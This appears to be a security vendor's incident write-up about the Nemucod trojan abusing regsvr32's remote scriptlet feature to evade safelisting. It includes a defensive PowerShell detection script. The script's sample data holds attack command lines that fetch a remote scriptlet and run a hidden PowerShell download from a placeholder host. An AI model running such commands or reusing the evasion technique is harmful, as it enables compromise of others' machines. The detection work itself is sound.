Nemucod Nailed in the Network

The Network: A state government agency that performs financial audits of other government departments.
 
The Expectation: Employee laptops are properly imaged and secured with brand-name, up-to-date Anti-Virus (AV). Some employees may take the machines home as part of their job function.
 
The Catch: During working hours, a particular laptop was observed making numerous connections to webservers in foreign destinations including Pakistan, Vietnam, Iran, and Serbia on ports 80 and 443, both of which the firewall permitted. The connections were being attempted by a PowerShell script, not a browser. Worse yet, the parent process was regsvr32.exe. The network owner was immediately notified of this behavior and of the specific laptop involved. It was pulled from the network and a forensics investigation commenced.
 
The Find: While away from the network, the user had browsed unsafe websites, which resulted in the download of the Trojan Nemucod. The Trojan was trying to install ransomware through a JScript installer, abusing a little-known Regsvr32 feature: the /i: switch accepts a URL, so Regsvr32 will fetch a specially crafted scriptlet from a remote web server and execute it on the local machine. These scriptlets are XML files containing embedded JScript or VBScript that runs when Regsvr32 processes the file. Because regsvr32.exe is a signed, trusted Windows binary, the technique evades application safelisting, including the safelisting capabilities of Netsurion Endpoint Detection and Response (EDR).
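The two behaviors described above (regsvr32.exe pulling a scriptlet from a URL, and regsvr32.exe as the parent of a PowerShell process) are straightforward to flag in process-creation telemetry. The PowerShell below is an added example, not part of the Netsurion write-up or its product: it runs two checks over process-creation records of the kind Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing) would provide. The records, hostnames and paths are constructed inline so the script runs offline; none of them are indicators from the actual case.

```powershell
# Added example: detection logic for the regsvr32 scriptlet technique.
# Input records are assumed to have Time, Image, ParentImage and CommandLine
# fields, which is what a Sysmon Event ID 1 record carries.

function Test-RegsvrScriptletLoad {
    param([Parameter(Mandatory)] [string]$CommandLine)
    # Remote scriptlet execution looks like:
    #   regsvr32 /s /n /u /i:http://host/file.sct scrobj.dll
    # The telling part is a /i: argument that carries a URL; -match is
    # case-insensitive in PowerShell, so mixed-case evasion is covered.
    return ($CommandLine -match 'regsvr32(\.exe)?\b' -and
            $CommandLine -match '/i:\s*"?https?://')
}

function Find-SuspiciousProcess {
    param([Parameter(Mandatory)] [object[]]$Events)
    foreach ($e in $Events) {
        $reasons = @()
        if ($e.Image -match '\\regsvr32\.exe$' -and (Test-RegsvrScriptletLoad $e.CommandLine)) {
            $reasons += 'regsvr32 loading a scriptlet from a URL'
        }
        # Child interpreters under regsvr32: the scriptlet has handed off to
        # a script engine, which is what was seen in this case.
        if ($e.ParentImage -match '\\regsvr32\.exe$' -and
            $e.Image -match '\\(powershell|pwsh|wscript|cscript|cmd|mshta)\.exe$') {
            $reasons += "regsvr32 spawned $([IO.Path]::GetFileName($e.Image))"
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time        = $e.Time
                Image       = $e.Image
                ParentImage = $e.ParentImage
                CommandLine = $e.CommandLine
                Reason      = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records (placeholder hostnames and paths, not IOCs).
$sample = @(
    [pscustomobject]@{
        Time        = '09:14:02'
        Image       = 'C:\Windows\System32\regsvr32.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll'
    }
    [pscustomobject]@{
        Time        = '09:14:03'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\regsvr32.exe'
        CommandLine = 'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/p"'
    }
    # Legitimate use: an installer registering a local DLL. Must not fire.
    [pscustomobject]@{
        Time        = '09:20:11'
        Image       = 'C:\Windows\System32\regsvr32.exe'
        ParentImage = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'
    }
)

Find-SuspiciousProcess -Events $sample | Format-Table -AutoSize
```

Only the first two records are reported; the third, a normal local DLL registration, produces no hit because neither a URL in /i: nor a script-engine child is present. The same functions can be fed live data by piping Sysmon events through Get-WinEvent and mapping the event fields onto the four properties the checks expect.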
 
The Fix: Unfortunately, Microsoft has remained silent regarding Regsvr32's ability to execute scripts from a remote URL. As it is not known whether this will be patched, it is important to block regsvr32.exe's access to the network through a software firewall. If you do not have a firewall installed that can block a specific executable from reaching the internet, the built-in Windows Firewall can do this. Note what the block covers: it stops Regsvr32 from fetching a scriptlet over the network, but not the scriptlet feature itself, which also works against a file already on disk, and it does not restrict any child process (such as PowerShell) that a scriptlet spawns. It is one layer, not the only one.
 
The Lesson: A layered approach to security saved the day. Despite the malware taking root on the laptop, a properly configured firewall blocked attempts to reach the Command and Control (C&C) servers. Netsurion’s SOC alerted the network owner who was able to disinfect the laptop.